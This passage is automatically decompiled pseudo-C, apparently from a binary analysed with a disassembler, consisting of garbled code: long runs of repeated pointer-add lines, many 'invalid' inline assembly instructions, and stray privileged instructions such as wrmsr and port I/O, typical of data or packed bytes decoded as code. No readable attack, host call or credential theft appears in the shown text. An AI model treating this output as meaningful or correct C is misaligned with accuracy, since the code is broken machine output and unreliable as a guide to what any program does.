					 *_t445 =  *_t445 + _t445;
					 *_t445 =  *_t445 + _t445;
					 *_t445 =  *_t445 + _t445;
					 *_t445 =  *_t445 ^ _t445;
					 *_t445 =  *_t445 + _t445;
					_t446 = _t445 + 1;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *0x3980a88f =  *0x3980a88f + _t740;
					 *((intOrPtr*)(_t759 - 0xc4a53bc)) =  *((intOrPtr*)(_t759 - 0xc4a53bc)) + _t740;
					 *(_t748 - 0x48) = _t703;
					 *_t740 = fs;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					asm("rcl ch, 0xee");
					_t444 = _t446 +  *((intOrPtr*)(_t756 + 0x6f));
					if(_t444 < 0) {
						break;
					}
					_pop(_t748);
					_t759 =  *(_t689 + 0x6b) * 0x726f7265;
					 *[ss:eax] =  *[ss:eax] + _t444;
					 *_t444 =  *_t444 + _t444;
					 *_t444 =  *_t444 + _t444;
					_t763 = _t764 + 1 - 1;
					 *_t444 =  *_t444 ^ _t444;
					_push(es);
					asm("stc");
					if( *_t444 > 0) {
						continue;
					} else {
						asm("in al, dx");
						asm("sti");
						_t740 = 0x49;
						_t780 = _t689 - 1;
						_t764 = 0x17291d76;
						while(_t780 > 0) {
							 *_t748 =  *_t748 - _t740;
							_t444 = _t444 - 0x7dd6ce7a;
							if(_t444 <= 0) {
								continue;
							} else {
								_pop(_t764);
								_t740 = 0x2b;
								asm("loop 0xfffffff9");
							}
							break;
						}
						_t689 = 0xc;
						 *((intOrPtr*)(_t740 - 0x6c2ca000)) =  *((intOrPtr*)(_t740 - 0x6c2ca000)) + _t703;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						 *_t444 =  *_t444 + _t444;
						_t444 = _t444 ^  *_t703;
						 *_t444 =  *_t444 + _t444;
					}
					break;
				}
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				_t447 = _t444 |  *_t444;
				_t758 = _t756 - 1 + 1;
				asm("outsd");
				if(_t758 < 0) {
					L12:
					 *_t689 =  *_t689 + 1;
					_t448 = _t447 -  *_t447;
					 *_t448 =  *_t448 + _t448;
					_t704 = _t703 +  *_t448;
					 *((intOrPtr*)(_t689 + 0x6f)) =  *((intOrPtr*)(_t689 + 0x6f)) + _t448;
					asm("insd");
					asm("insd");
					asm("popad");
					asm("outsb");
					goto L13;
				} else {
					_t448 = _t447 - 1;
					_t704 = _t447;
					_t764 = _t764;
					 *0x46000c01 =  *0x46000c01 + _t704;
					asm("outsd");
					if( *0x46000c01 < 0) {
						L13:
						_t450 = (_t448 ^  *[fs:eax]) + 1;
						 *_t450 =  *_t450 | _t450;
						_t689 = _t689 + 1;
						asm("outsd");
						asm("insd");
						asm("insd");
						asm("popad");
						asm("outsb");
						_t452 = (_t450 ^  *[fs:eax]) + 0xe8;
						 *_t452 =  *_t452 | _t740;
						_t453 = _t452 | 0x000000bf;
					} else {
						_t453 = _t448 - 1;
						_t759 = _t759 + 1 - 1;
						_push(_t764);
						_t704 = _t704 + 1 - 1;
						_t758 = _t758 - 1;
						 *_t704 =  *_t704 + _t689;
						 *_t453 =  *_t453 + _t453;
						_t740 = _t740 + 1;
						 *((intOrPtr*)(_t764 + _t704)) =  *((intOrPtr*)(_t764 + _t704)) + _t453;
						_t13 = _t758 + 0x6f;
						 *_t13 =  *((intOrPtr*)(_t758 + 0x6f)) + _t453;
						if( *_t13 >= 0) {
							_t681 = _t453 - 1;
							_t759 = _t759 + 1 - 1;
							_push(_t764);
							_t703 = _t704 + 1 - 1;
							_t758 = _t758 - 1;
							 *0x19fa =  *0x19fa + _t740;
							asm("sbb al, [eax]");
							_t700 = _t689 + _t703;
							_push(ds);
							 *_t681 =  *_t681 + _t681;
							_t764 = _t764 + 1;
							 *((intOrPtr*)(_t758 + 3)) =  *((intOrPtr*)(_t758 + 3)) + _t681;
							 *_t703 =  *_t703 + 1;
							_t682 = _t681 -  *_t681;
							 *_t682 =  *_t682 + _t682;
							 *_t682 =  *_t682 + _t703;
							 *((intOrPtr*)(_t700 + 0x6f)) =  *((intOrPtr*)(_t700 + 0x6f)) + _t682;
							asm("insd");
							asm("insd");
							asm("popad");
							asm("outsb");
							_t684 = (_t682 ^  *[fs:eax]) + 1;
							 *_t684 =  *_t684 | _t684;
							_t689 = _t700 + 1;
							asm("outsd");
							asm("insd");
							asm("insd");
							asm("popad");
							asm("outsb");
							asm("wrmsr");
							 *_t703 =  *_t703 + _t740;
							_t447 = ((_t684 ^  *[fs:eax]) + 0x000000f0 | 0x000000bf) + 0xef +  *((intOrPtr*)(((_t684 ^  *[fs:eax]) + 0x000000f0 | 0x000000bf) + 0xef));
							goto L12;
						}
					}
				}
				 *_t689 =  *_t689 + 1;
				_t455 = _t453 +  *_t453 -  *((intOrPtr*)(_t453 +  *_t453));
				 *_t455 =  *_t455 + _t455;
				_t705 = _t704 +  *_t455;
				 *((intOrPtr*)(_t689 + 0x6f)) =  *((intOrPtr*)(_t689 + 0x6f)) + _t455;
				asm("insd");
				asm("insd");
				asm("popad");
				asm("outsb");
				 *[fs:eax] =  *[fs:eax] ^ _t455;
				_t456 = _t455 + 1;
				 *_t456 =  *_t456 | _t456;
				_t690 = _t689 + 1;
				asm("outsd");
				asm("insd");
				asm("insd");
				asm("popad");
				asm("outsb");
				 *[fs:eax] =  *[fs:eax] ^ _t456;
				_t457 = _t456 + 0xf0;
				 *((intOrPtr*)(_t457 - 0x10fb40f5)) =  *((intOrPtr*)(_t457 - 0x10fb40f5)) + _t690;
				 *_t705 =  *_t705 + _t740;
				 *_t457 =  *_t457 + _t457;
				 *_t690 =  *_t690 + 1;
				 *[es:eax] =  *[es:eax] + _t457;
				 *((intOrPtr*)(_t758 + _t457)) =  *((intOrPtr*)(_t758 + _t457)) + _t457;
				 *((intOrPtr*)(_t758 + 0x72)) =  *((intOrPtr*)(_t758 + 0x72)) + _t457;
				asm("popad");
				asm("insd");
				 *[gs:eax] =  *[gs:eax] ^ _t457;
				_t458 = _t457 +  *_t705;
				_push(es);
				 *((intOrPtr*)(_t758 + 0x72)) =  *((intOrPtr*)(_t758 + 0x72)) + _t458;
				asm("popad");
				asm("insd");
				 *[gs:eax] =  *[gs:eax] ^ _t458;
				_t459 = _t458 + 0xf00000;
				_pop(es);
				_pop(ss);
				_t750 = 0x1204;
				 *_t690 =  *_t690 + 1;
				asm("sbb al, [eax]");
				 *_t459 =  *_t459 + _t459;
				_t460 = _t459 + 0x69540006;
				asm("insd");
				if(_t460 < 0) {
					L17:
					_t461 = _t460 + 1;
					 *_t750 =  *_t750 + _t461;
					 *_t461 =  *_t461 + _t461;
					 *((intOrPtr*)(_t461 + 0x31)) =  *((intOrPtr*)(_t461 + 0x31)) + _t740;
					_t462 = _t461 + 1;
					 *_t750 =  *_t750 + _t462;
					 *_t462 =  *_t462 + _t462;
					 *_t462 =  *_t462 + _t690;
					 *_t462 =  *_t462 ^ _t462;
					_pop(es);
					 *_t462 =  *_t462 + _t462;
					 *((intOrPtr*)(_t462 + _t758 + 0x70040)) =  *((intOrPtr*)(_t462 + _t758 + 0x70040)) + _t705;
				} else {
					 *_t690 =  *_t690 + _t705;
					_pop(es);
					_t845 = _t845 *  *_t705;
					 *_t460 =  *_t460 + _t460;
					_t462 = _t460 | _t690;
					 *_t462 =  *_t462 | _t462;
					_t690 = _t690 + _t690 +  *_t740;
					 *_t462 =  *_t462 + _t462;
					 *_t758 =  *_t758 + _t462;
					_push(es);
					_t33 = _t705 + 0x6d + _t759 * 2;
					 *_t33 =  *((intOrPtr*)(_t705 + 0x6d + _t759 * 2)) + _t740;
					if( *_t33 >= 0) {
						 *_t690 =  *_t690 + _t705;
						_pop(es);
						_t845 = _t845 *  *_t705;
						 *_t462 =  *_t462 + _t462;
						_t678 = _t462 | _t690;
						 *_t678 =  *_t678 | _t678;
						_t690 = _t690 + _t690;
						_t679 = _t678 +  *((intOrPtr*)(_t678 + _t678));
						_push(es);
						 *_t679 =  *_t679 + _t679;
						_t460 = _t679 + _t679 ^  *(_t679 + _t679);
						goto L17;
					}
				}
				 *_t462 =  *_t462 + _t462;
				asm("pushad");
				 *_t462 =  *_t462 ^ _t462;
				_pop(es);
				 *_t462 =  *_t462 + _t462;
				 *_t462 = _t705 +  *_t462;
				 *_t462 =  *_t462 ^ _t462;
				 *_t462 =  *_t462 + _t462;
				_push(cs);
				 *_t462 = _t705 +  *_t462;
				_t463 = _t462 & 0x00000040;
				 *_t463 =  *_t463 + _t463;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t463 =  *_t463 + _t463;
				 *_t463 =  *_t463 + _t463;
				asm("cld");
				asm("daa");
				_t466 = _t705;
				_t707 = _t463 + 1 + _t705 + 1;
				 *_t466 = _t466 +  *_t466;
				 *_t466 = _t466 +  *_t466;
				_t466[0x91f] = _t466[0x91f] + _t707;
				 *_t466 = _t466 +  *_t466;
				 *_t466 = _t466 +  *_t466;
				 *_t466 = _t466 +  *_t466;
				 *_t466 = _t466 +  *_t466;
				 *_t466 = _t466 +  *_t466;
				_t467 = _t466 + _t707;
				asm("adc eax, [eax]");
				 *_t467 =  *_t467 + _t467;
				asm("adc [eax], eax");
				 *0x40 =  *0x40 | _t467;
				 *_t467 =  *_t467 + _t467;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t467 =  *_t467 + _t467;
				 *_t467 =  *_t467 + _t467;
				 *_t467 = gs;
				_t468 = _t467 + 1;
				 *_t468 =  *_t468 + _t690;
				_t469 = _t740;
				_t741 = _t468;
				_t708 = _t707 + 1;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t690;
				if( *_t469 <= 0) {
					 *_t469 =  *_t469 + _t469;
					 *_t469 =  *_t469 + _t469;
					 *_t469 =  *_t469 + _t469;
					 *_t469 =  *_t469 + _t469;
					 *_t469 =  *_t469 + _t469;
					 *_t469 =  *_t469 + _t469;
					 *((intOrPtr*)(_t764 + _t741)) =  *((intOrPtr*)(_t764 + _t741)) + _t469;
					_t677 = _t469 + 1;
					 *_t708 =  *_t708 + _t677;
					 *_t741 =  *_t741 + _t741;
					 *_t677 =  *_t677 + _t708;
					_t469 = _t677 & 0x00000040;
					 *_t469 =  *_t469 + _t469;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
				}
				 *_t469 =  *_t469 + 1;
				 *_t469 =  *_t469 + _t469;
				 *((intOrPtr*)(_t469 + _t759 - 0x6dd7ffc0)) =  *((intOrPtr*)(_t469 + _t759 - 0x6dd7ffc0)) + _t690;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				_t710 = _t469;
				_t471 = _t708 + 0x00000001 &  *(_t708 + 1);
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				_pop(_t765);
				asm("adc al, 0x40");
				 *_t710 =  *_t710 + _t471;
				 *_t750 =  *_t750 + _t710;
				 *_t471 =  *_t471 + _t710;
				_t472 = _t471 & 0x00000040;
				 *_t472 =  *_t472 + _t472;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t472 =  *_t472 + _t472;
				 *_t472 =  *_t472 + _t472;
				_t476 = _t710;
				_t712 = _t472 - 0x28 + 1 + _t690 + 1;
				 *_t476 =  *_t476 + _t476;
				 *_t476 =  *_t476 + _t476;
				 *((intOrPtr*)(_t476 + 0x7e)) =  *((intOrPtr*)(_t476 + 0x7e)) + _t690;
				_t477 = _t476 & 0x00000000;
				 *_t477 =  *_t477 + _t477;
				 *_t477 =  *_t477 + _t477;
				 *_t477 =  *_t477 + _t477;
				 *_t477 =  *_t477 + _t477;
				 *_t477 =  *_t477 + _t477;
				 *_t477 =  *_t477 + _t477;
				_t478 = _t765;
				asm("adc al, 0x40");
				 *_t712 =  *_t712 + _t478;
				 *_t712 =  *_t712 + _t712;
				 *_t478 =  *_t478 + _t712;
				_t479 = _t478 & 0x00000040;
				 *_t479 =  *_t479 + _t479;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				_t481 = (_t479 | 0x00000027) + 1;
				 *((intOrPtr*)(_t481 + 0x4191)) =  *((intOrPtr*)(_t481 + 0x4191)) + _t690;
				 *_t481 =  *_t481 + _t481;
				 *((intOrPtr*)(_t481 + 0x247f)) =  *((intOrPtr*)(_t481 + 0x247f)) + _t712;
				 *_t481 =  *_t481 + _t481;
				 *_t481 =  *_t481 + _t481;
				 *_t481 =  *_t481 + _t481;
				 *_t481 =  *_t481 + _t481;
				 *_t481 =  *_t481 + _t481;
				_t482 = _t481 + _t712;
				asm("adc al, 0x40");
				 *_t712 =  *_t712 + _t482;
				 *_t482 =  *_t482 + _t712;
				 *_t482 =  *_t482 + _t712;
				_t483 = _t482 & 0x00000040;
				 *_t483 =  *_t483 + _t483;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t483 =  *_t483 + _t483;
				 *_t483 =  *_t483 + _t483;
				_t484 = _t483 + 1;
				 *((intOrPtr*)(_t484 + 0x4191)) =  *((intOrPtr*)(_t484 + 0x4191)) + _t712;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t690;
				if( *_t484 <= 0) {
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *((intOrPtr*)(_t741 + 0x10040)) =  *((intOrPtr*)(_t741 + 0x10040)) + _t484;
					_pop(es);
					 *_t484 =  *_t484 + _t712;
					_t484 = _t484 & 0x00000040;
					 *_t484 =  *_t484 + _t484;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
				}
				 *_t484 =  *_t484 + 1;
				 *_t484 =  *_t484 + _t484;
				 *((intOrPtr*)(_t758 - 0x6e87ffc0)) =  *((intOrPtr*)(_t758 - 0x6e87ffc0)) + _t712;
				_t713 = _t712 + 1;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *((intOrPtr*)(_t484 + 0x247d)) =  *((intOrPtr*)(_t484 + 0x247d)) + _t713;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *((intOrPtr*)(_t741 + 0x10040)) =  *((intOrPtr*)(_t741 + 0x10040)) + _t690;
				asm("adc [eax], al");
				 *0x40 =  *0x40 | _t484;
				 *_t484 =  *_t484 + _t484;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				_pop(_t767);
				 *_t484 =  *_t484 - _t484;
				 *(_t741 + 0x41) =  *(_t741 + 0x41) | _t741;
				 *_t484 =  *_t484 + _t484;
				asm("enter 0x247e, 0x0");
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				if( *_t484 != 0) {
					_t484 = _t484 + 1;
					 *_t713 =  *_t713 + _t484;
					 *0x40250800 =  *0x40250800 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					_t690 = _t690 + _t690;
					asm("invalid");
					asm("invalid");
					asm("invalid");
				}
				 *_t484 =  *_t484 + 1;
				 *_t484 =  *_t484 + _t484;
				 *((intOrPtr*)(_t758 + 0x40)) =  *((intOrPtr*)(_t758 + 0x40)) + _t713;
				 *((intOrPtr*)(_t484 - 0x6f)) =  *((intOrPtr*)(_t484 - 0x6f)) + _t690;
				_t714 = _t713 + 1;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t484;
				 *_t484 =  *_t484 + _t714;
				if( *_t484 >= 0) {
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *_t484 =  *_t484 + _t484;
					 *((intOrPtr*)(_t759 + _t741 + 0x10040)) =  *((intOrPtr*)(_t759 + _t741 + 0x10040)) + _t714;
					asm("sbb [eax], eax");
					 *0x40 =  *0x40 | _t484;
					 *_t484 =  *_t484 + _t484;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
				}
				 *_t484 =  *_t484 + 1;
				 *_t484 =  *_t484 + _t484;
				 *((intOrPtr*)(_t741 + _t759)) =  *((intOrPtr*)(_t741 + _t759)) + _t714;
				_t485 = _t484 + 1;
				 *((intOrPtr*)(_t485 + 0x4192)) =  *((intOrPtr*)(_t485 + 0x4192)) + _t690;
				do {
					 *_t485 =  *_t485 + _t485;
					 *_t485 =  *_t485 + _t485;
					 *((intOrPtr*)(_t690 + 0x23)) =  *((intOrPtr*)(_t690 + 0x23)) + _t741;
					 *_t485 =  *_t485 + _t485;
					 *_t485 =  *_t485 + _t485;
					 *_t485 =  *_t485 + _t485;
					 *_t485 =  *_t485 + _t485;
					 *_t485 =  *_t485 + _t485;
					asm("in al, 0x15");
					_t486 = _t485 + 1;
					 *_t714 =  *_t714 + _t486;
					 *_t486 =  *_t486 + _t690;
					 *_t486 =  *_t486 + _t714;
					_t487 = _t486 & 0x00000040;
					 *_t487 =  *_t487 + _t487;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t487 =  *_t487 + _t487;
					 *_t487 =  *_t487 + _t487;
					asm("fsubr qword [ecx]");
					_t488 = _t487 + 1;
					 *((intOrPtr*)(_t488 + 0x4192)) =  *((intOrPtr*)(_t488 + 0x4192)) + _t714;
					 *_t488 =  *_t488 + _t488;
					_t490 = _t741;
					_t741 = _t488 + _t741;
					_t491 = _t490 &  *_t490;
					 *_t491 =  *_t491 + _t491;
					 *_t491 =  *_t491 + _t491;
					 *_t491 =  *_t491 + _t491;
					 *_t491 =  *_t491 + _t491;
					 *_t491 =  *_t491 + _t491;
					 *_t491 =  *_t491 + _t491;
					asm("sbb al, 0x16");
					_t492 = _t491 + 1;
					 *_t714 =  *_t714 + _t492;
					 *_t750 =  *_t750 + _t741;
					 *_t492 =  *_t492 + _t714;
					_t485 = _t492 & 0x00000040;
					 *_t485 =  *_t485 + _t485;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t485 =  *_t485 + _t485;
					 *_t485 =  *_t485 + _t485;
					asm("lodsb");
					 *_t485 =  *_t485 - _t485;
				} while ( *_t485 < 0);
				_t715 = _t714 + 1;
				 *_t485 =  *_t485 + _t485;
				 *_t485 =  *_t485 + _t485;
				 *((intOrPtr*)(_t485 - 0x6e)) =  *((intOrPtr*)(_t485 - 0x6e)) + _t741;
				_t493 = _t485 &  *_t485;
				 *_t493 =  *_t493 + _t493;
				 *_t493 =  *_t493 + _t493;
				 *_t493 =  *_t493 + _t493;
				 *_t493 =  *_t493 + _t493;
				 *_t493 =  *_t493 + _t493;
				 *_t493 =  *_t493 + _t493;
				_push(_t767);
				_push(ss);
				_t494 = _t493 + 1;
				 *_t715 =  *_t715 + _t494;
				 *_t758 =  *_t758 + _t741;
				 *_t494 =  *_t494 + _t715;
				_t495 = _t494 & 0x00000040;
				 *_t495 =  *_t495 + _t495;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t495 =  *_t495 + _t495;
				 *_t495 =  *_t495 + _t495;
				if( *_t495 >= 0) {
					_t495 = _t495 + 1;
					 *((intOrPtr*)(_t495 - 0x6e)) =  *((intOrPtr*)(_t495 - 0x6e)) + _t715;
					_t715 = _t715 + 1;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *((intOrPtr*)(_t495 + 0x2391)) =  *((intOrPtr*)(_t495 + 0x2391)) + _t495;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *((intOrPtr*)(_t758 + _t741 + 0x10040)) =  *((intOrPtr*)(_t758 + _t741 + 0x10040)) + _t715;
					asm("adc eax, 0x40250800");
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
				}
				_t691 = _t690 + _t690;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t495 =  *_t495 + 1;
				 *_t495 =  *_t495 + _t495;
				 *((intOrPtr*)(_t715 + 0x40 + _t759)) =  *((intOrPtr*)(_t715 + 0x40 + _t759)) + _t715;
				 *((intOrPtr*)(_t495 - 0x6e)) =  *((intOrPtr*)(_t495 - 0x6e)) + _t691;
				 *_t495 =  *_t495 + _t495;
				 *_t495 =  *_t495 + _t495;
				 *_t495 =  *_t495 + _t495;
				_t717 = _t495;
				_t497 = _t715 + 0x00000001 &  *(_t715 + 1);
				do {
					 *_t497 =  *_t497 + _t497;
					 *_t497 =  *_t497 + _t497;
					 *_t497 =  *_t497 + _t497;
					 *_t497 =  *_t497 + _t497;
					 *_t497 =  *_t497 + _t497;
					 *_t497 =  *_t497 + _t497;
					_push(ss);
					_t499 = _t497 + _t497 + 1;
					 *_t717 =  *_t717 + _t499;
					 *((intOrPtr*)(_t499 + _t499)) =  *((intOrPtr*)(_t499 + _t499)) + _t741;
					 *0x40 =  *0x40 | _t499;
					 *_t499 =  *_t499 + _t499;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t499 =  *_t499 + _t499;
					 *_t499 =  *_t499 + _t499;
					asm("sbb al, 0x29");
					_t500 = _t499 + 1;
					 *((intOrPtr*)(_t500 - 0x6e)) =  *((intOrPtr*)(_t500 - 0x6e)) + _t717;
					 *_t500 =  *_t500 + _t500;
					 *_t500 =  *_t500 + _t500;
					 *_t500 =  *_t500 + _t741;
					_t501 = _t717 + 1;
					_t717 = _t500;
					_t502 = _t501 &  *_t501;
					 *_t502 =  *_t502 + _t502;
					 *_t502 =  *_t502 + _t502;
					 *_t502 =  *_t502 + _t502;
					 *_t502 =  *_t502 + _t502;
					 *_t502 =  *_t502 + _t502;
					 *_t502 =  *_t502 + _t502;
					asm("cld");
					_push(ss);
					_t503 = _t502 + 1;
					 *_t717 =  *_t717 + _t503;
					 *_t691 =  *_t691 + _t741;
					 *_t503 =  *_t503 + _t717;
					_t497 = _t503 & 0x00000040;
					 *_t497 =  *_t497 + _t497;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t497 =  *_t497 + _t497;
					 *_t497 =  *_t497 + _t497;
					asm("in al, dx");
					 *_t497 =  *_t497 - _t497;
					 *_t497 =  *_t497 + _t497;
				} while ( *_t497 < 0);
				_t504 = _t497 &  *_t497;
				 *_t504 =  *_t504 + _t504;
				 *_t504 =  *_t504 + _t504;
				 *_t504 =  *_t504 + _t504;
				 *_t504 =  *_t504 + _t504;
				 *_t504 =  *_t504 + _t504;
				 *_t504 =  *_t504 + _t504;
				_t506 = (_t504 ^ 0x00000017) + 1;
				 *_t717 =  *_t717 + _t506;
				 *_t691 =  *_t691 + _t506;
				 *_t506 =  *_t506 + _t717;
				_t507 = _t506 & 0x00000040;
				 *_t507 =  *_t507 + _t507;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t507 =  *_t507 + _t507;
				 *_t507 =  *_t507 + _t507;
				asm("in al, dx");
				_t508 = _t507 & 0x91380040;
				_t719 = _t717 + 1;
				 *_t508 =  *_t508 + _t508;
				 *_t508 =  *_t508 + _t508;
				 *((intOrPtr*)(_t508 + 0x247d)) =  *((intOrPtr*)(_t508 + 0x247d)) + _t691;
				 *_t508 =  *_t508 + _t508;
				 *_t508 =  *_t508 + _t508;
				 *_t508 =  *_t508 + _t508;
				 *_t508 =  *_t508 + _t508;
				 *_t508 =  *_t508 + _t508;
				 *((intOrPtr*)(_t750 + 0x40 + _t741)) =  *((intOrPtr*)(_t750 + 0x40 + _t741)) + _t719;
				 *_t719 =  *_t719 + _t508;
				 *_t758 =  *_t758 + _t508;
				 *_t508 =  *_t508 + _t719;
				_t509 = _t508 & 0x00000040;
				 *_t509 =  *_t509 + _t509;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t509 =  *_t509 + _t509;
				 *_t509 =  *_t509 + _t509;
				if( *_t509 >= 0) {
					_t675 = _t509 + 1;
					 *((intOrPtr*)(_t675 - 0x6f)) =  *((intOrPtr*)(_t675 - 0x6f)) + _t719;
					_t719 = _t719 + 1;
					 *_t675 =  *_t675 + _t675;
					 *_t675 =  *_t675 + _t675;
					 *((intOrPtr*)(_t675 + 0x7d)) =  *((intOrPtr*)(_t675 + 0x7d)) + _t691;
					_t676 = _t675 & 0x00000000;
					 *_t676 =  *_t676 + _t676;
					 *_t676 =  *_t676 + _t676;
					 *_t676 =  *_t676 + _t676;
					 *_t676 =  *_t676 + _t676;
					 *_t676 =  *_t676 + _t676;
					 *_t676 =  *_t676 + _t676;
					asm("movsb");
					_pop(ss);
					_t509 = _t676 + 1;
					 *_t719 =  *_t719 + _t509;
					 *0x40250800 =  *0x40250800 + _t719;
					 *_t509 =  *_t509 + _t509;
				}
				 *_t509 =  *_t509 + _t509;
				 *_t509 =  *_t509 + _t509;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t509 =  *_t509 + _t509;
				 *_t509 =  *_t509 + _t509;
				asm("int3");
				asm("daa");
				_t512 = _t719;
				_t721 = _t509 + 1 + _t691 + 1;
				 *_t512 =  *_t512 + _t512;
				 *_t512 =  *_t512 + _t512;
				 *_t512 =  *_t512 + _t721;
				if( *_t512 <= 0) {
					 *_t512 =  *_t512 + _t512;
					 *_t512 =  *_t512 + _t512;
					 *_t512 =  *_t512 + _t512;
					 *_t512 =  *_t512 + _t512;
					 *_t512 =  *_t512 + _t512;
					 *_t512 =  *_t512 + _t512;
					_pop(ss);
					_t512 = _t512 + _t691 + 1;
					 *_t721 =  *_t721 + _t512;
					 *((intOrPtr*)(_t512 + _t512)) =  *((intOrPtr*)(_t512 + _t512)) + _t721;
					 *0x40 =  *0x40 | _t512;
					 *_t512 =  *_t512 + _t512;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
				}
				 *_t512 =  *_t512 + 1;
				 *_t512 =  *_t512 + _t512;
				 *((intOrPtr*)(_t750 - 0x6e37ffc0)) =  *((intOrPtr*)(_t750 - 0x6e37ffc0)) + _t691;
				_t722 = _t721 + 1;
				 *_t512 =  *_t512 + _t512;
				 *_t512 =  *_t512 + _t512;
				 *((intOrPtr*)(_t512 + 0x7f)) =  *((intOrPtr*)(_t512 + 0x7f)) + _t722;
				_t513 = _t512 & 0x00000000;
				 *_t513 =  *_t513 + _t513;
				 *_t513 =  *_t513 + _t513;
				 *_t513 =  *_t513 + _t513;
				 *_t513 =  *_t513 + _t513;
				 *_t513 =  *_t513 + _t513;
				 *_t513 =  *_t513 + _t513;
				asm("adc al, 0x18");
				_t514 = _t513 + 1;
				 *_t722 =  *_t722 + _t514;
				 *_t691 =  *_t691 + _t722;
				 *_t514 =  *_t514 + _t722;
				_t515 = _t514 & 0x00000040;
				 *_t515 =  *_t515 + _t515;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t515 =  *_t515 + _t515;
				 *_t515 =  *_t515 + _t515;
				asm("insb");
				asm("daa");
				_t516 = _t515 + 1;
				 *((intOrPtr*)(_t516 + 0x4191)) =  *((intOrPtr*)(_t516 + 0x4191)) + _t691;
				 *_t516 =  *_t516 + _t516;
				_t517 = _t516 + _t691;
				if(_t517 < 0) {
					 *_t517 =  *_t517 + _t517;
					 *_t517 =  *_t517 + _t517;
					 *_t517 =  *_t517 + _t517;
					 *_t517 =  *_t517 + _t517;
					 *_t517 =  *_t517 + _t517;
					 *_t517 =  *_t517 + _t517;
					 *((intOrPtr*)(_t517 + _t691 + 0x40)) =  *((intOrPtr*)(_t517 + _t691 + 0x40)) + _t722;
					 *_t722 =  *_t722 + _t517;
					 *((intOrPtr*)(_t517 + _t517)) =  *((intOrPtr*)(_t517 + _t517)) + _t517;
					 *0x40 =  *0x40 | _t517;
					 *_t517 =  *_t517 + _t517;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
				}
				 *_t517 =  *_t517 + 1;
				 *_t517 =  *_t517 + _t517;
				 *_t758 =  *_t758 + _t691;
